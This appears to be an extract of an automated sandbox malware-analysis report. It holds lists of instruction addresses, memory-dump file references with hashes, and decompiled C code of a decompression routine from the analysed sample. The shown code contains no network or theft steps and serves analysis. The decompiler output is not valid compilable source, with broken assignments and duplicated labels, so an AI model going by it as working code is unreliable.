                                                                                                                                                                                                  0x00406d7b
                                                                                                                                                                                                  0x00406d7d
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d5d
                                                                                                                                                                                                  0x00406d62
                                                                                                                                                                                                  0x00406d64
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d80
                                                                                                                                                                                                  0x00406d87
                                                                                                                                                                                                  0x00406d8a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d8c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d8c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x0040701d
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00407023
                                                                                                                                                                                                  0x00407026
                                                                                                                                                                                                  0x00407029
                                                                                                                                                                                                  0x0040702d
                                                                                                                                                                                                  0x00407030
                                                                                                                                                                                                  0x00407036
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x0040703b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406dec
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407128
                                                                                                                                                                                                  0x0040712c
                                                                                                                                                                                                  0x0040714e
                                                                                                                                                                                                  0x00407151
                                                                                                                                                                                                  0x0040715b
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040712e
                                                                                                                                                                                                  0x00407131
                                                                                                                                                                                                  0x00407135
                                                                                                                                                                                                  0x00407138
                                                                                                                                                                                                  0x00407138
                                                                                                                                                                                                  0x0040713b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071e5
                                                                                                                                                                                                  0x004071e9
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x0040720e
                                                                                                                                                                                                  0x00407215
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x004071eb
                                                                                                                                                                                                  0x004071ee
                                                                                                                                                                                                  0x004071f1
                                                                                                                                                                                                  0x004071f4
                                                                                                                                                                                                  0x004071fb
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x00407142
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072d6
                                                                                                                                                                                                  0x004072d9
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f10
                                                                                                                                                                                                  0x00406f12
                                                                                                                                                                                                  0x00406f19
                                                                                                                                                                                                  0x00406f1a
                                                                                                                                                                                                  0x00406f1c
                                                                                                                                                                                                  0x00406f1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                                  0x00406f2a
                                                                                                                                                                                                  0x00406f2d
                                                                                                                                                                                                  0x00406f2f
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f32
                                                                                                                                                                                                  0x00406f35
                                                                                                                                                                                                  0x00406f3c
                                                                                                                                                                                                  0x00406f3f
                                                                                                                                                                                                  0x00406f4d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407226
                                                                                                                                                                                                  0x0040722d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407236
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x0040723c
                                                                                                                                                                                                  0x0040723f
                                                                                                                                                                                                  0x00407242
                                                                                                                                                                                                  0x00407246
                                                                                                                                                                                                  0x00407249
                                                                                                                                                                                                  0x0040724f
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407254
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725e
                                                                                                                                                                                                  0x004072be
                                                                                                                                                                                                  0x004072c1
                                                                                                                                                                                                  0x004072c6
                                                                                                                                                                                                  0x004072c7
                                                                                                                                                                                                  0x004072c9
                                                                                                                                                                                                  0x004072cb
                                                                                                                                                                                                  0x004072ce
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071e0
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00407260
                                                                                                                                                                                                  0x00407266
                                                                                                                                                                                                  0x00407269
                                                                                                                                                                                                  0x0040726c
                                                                                                                                                                                                  0x0040726f
                                                                                                                                                                                                  0x00407272
                                                                                                                                                                                                  0x00407275
                                                                                                                                                                                                  0x00407278
                                                                                                                                                                                                  0x0040727b
                                                                                                                                                                                                  0x0040727e
                                                                                                                                                                                                  0x00407281
                                                                                                                                                                                                  0x0040729a
                                                                                                                                                                                                  0x0040729d
                                                                                                                                                                                                  0x004072a0
                                                                                                                                                                                                  0x004072a3
                                                                                                                                                                                                  0x004072a7
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072aa
                                                                                                                                                                                                  0x004072ad
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x0040728b
                                                                                                                                                                                                  0x00407290
                                                                                                                                                                                                  0x00407292
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x004072b0
                                                                                                                                                                                                  0x004072b7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f55
                                                                                                                                                                                                  0x00406f58
                                                                                                                                                                                                  0x00406f8e
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c4
                                                                                                                                                                                                  0x004070c6
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x004070cc
                                                                                                                                                                                                  0x004070cf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070d5
                                                                                                                                                                                                  0x004070d9
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00406f5a
                                                                                                                                                                                                  0x00406f5c
                                                                                                                                                                                                  0x00406f5e
                                                                                                                                                                                                  0x00406f60
                                                                                                                                                                                                  0x00406f63
                                                                                                                                                                                                  0x00406f64
                                                                                                                                                                                                  0x00406f66
                                                                                                                                                                                                  0x00406f68
                                                                                                                                                                                                  0x00406f6b
                                                                                                                                                                                                  0x00406f6e
                                                                                                                                                                                                  0x00406f84
                                                                                                                                                                                                  0x00406f89
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc5
                                                                                                                                                                                                  0x00406ff1
                                                                                                                                                                                                  0x00406ff3
                                                                                                                                                                                                  0x00406ffa
                                                                                                                                                                                                  0x00406ffd
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407007
                                                                                                                                                                                                  0x0040700a
                                                                                                                                                                                                  0x00407011
                                                                                                                                                                                                  0x00407014
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407044
                                                                                                                                                                                                  0x00407047
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00407049
                                                                                                                                                                                                  0x0040704f
                                                                                                                                                                                                  0x00407052
                                                                                                                                                                                                  0x00407055
                                                                                                                                                                                                  0x00407058
                                                                                                                                                                                                  0x0040705b
                                                                                                                                                                                                  0x0040705e
                                                                                                                                                                                                  0x00407061
                                                                                                                                                                                                  0x00407064
                                                                                                                                                                                                  0x00407067
                                                                                                                                                                                                  0x0040706a
                                                                                                                                                                                                  0x00407083
                                                                                                                                                                                                  0x00407085
                                                                                                                                                                                                  0x00407088
                                                                                                                                                                                                  0x00407089
                                                                                                                                                                                                  0x0040708c
                                                                                                                                                                                                  0x0040708e
                                                                                                                                                                                                  0x00407091
                                                                                                                                                                                                  0x00407093
                                                                                                                                                                                                  0x00407095
                                                                                                                                                                                                  0x00407098
                                                                                                                                                                                                  0x0040709a
                                                                                                                                                                                                  0x0040709d
                                                                                                                                                                                                  0x004070a1
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a4
                                                                                                                                                                                                  0x004070a7
                                                                                                                                                                                                  0x004070aa
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x00407074
                                                                                                                                                                                                  0x00407079
                                                                                                                                                                                                  0x0040707b
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x004070ad
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x00406fc7
                                                                                                                                                                                                  0x00406fca
                                                                                                                                                                                                  0x00406fcc
                                                                                                                                                                                                  0x00406fcf
                                                                                                                                                                                                  0x00406fd2
                                                                                                                                                                                                  0x00406fd5
                                                                                                                                                                                                  0x00406fd7
                                                                                                                                                                                                  0x00406fda
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe3
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406f70
                                                                                                                                                                                                  0x00406f73
                                                                                                                                                                                                  0x00406f75
                                                                                                                                                                                                  0x00406f78
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cdb
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00406ce1
                                                                                                                                                                                                  0x00406ce4
                                                                                                                                                                                                  0x00406ce7
                                                                                                                                                                                                  0x00406cea
                                                                                                                                                                                                  0x00406ced
                                                                                                                                                                                                  0x00406cf0
                                                                                                                                                                                                  0x00406cf3
                                                                                                                                                                                                  0x00406cf5
                                                                                                                                                                                                  0x00406cf8
                                                                                                                                                                                                  0x00406cfb
                                                                                                                                                                                                  0x00406cfe
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e66
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00406e6c
                                                                                                                                                                                                  0x00406e6f
                                                                                                                                                                                                  0x00406e72
                                                                                                                                                                                                  0x00406e75
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e7a
                                                                                                                                                                                                  0x00406e7d
                                                                                                                                                                                                  0x00406e80
                                                                                                                                                                                                  0x00406e83
                                                                                                                                                                                                  0x00406e86
                                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                                  0x00406e8a
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                  0x00406e92
                                                                                                                                                                                                  0x00406e95
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e9b
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070e9
                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                  0x004070ef
                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f7
                                                                                                                                                                                                  0x004070fa
                                                                                                                                                                                                  0x004070fd
                                                                                                                                                                                                  0x00407100
                                                                                                                                                                                                  0x00407103
                                                                                                                                                                                                  0x00407106
                                                                                                                                                                                                  0x00407107
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x0040710c
                                                                                                                                                                                                  0x0040710f
                                                                                                                                                                                                  0x00407112
                                                                                                                                                                                                  0x00407115
                                                                                                                                                                                                  0x00407118
                                                                                                                                                                                                  0x0040711c
                                                                                                                                                                                                  0x0040711e
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00407356
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d95

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                  • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                  			E00406EAF() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407395))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
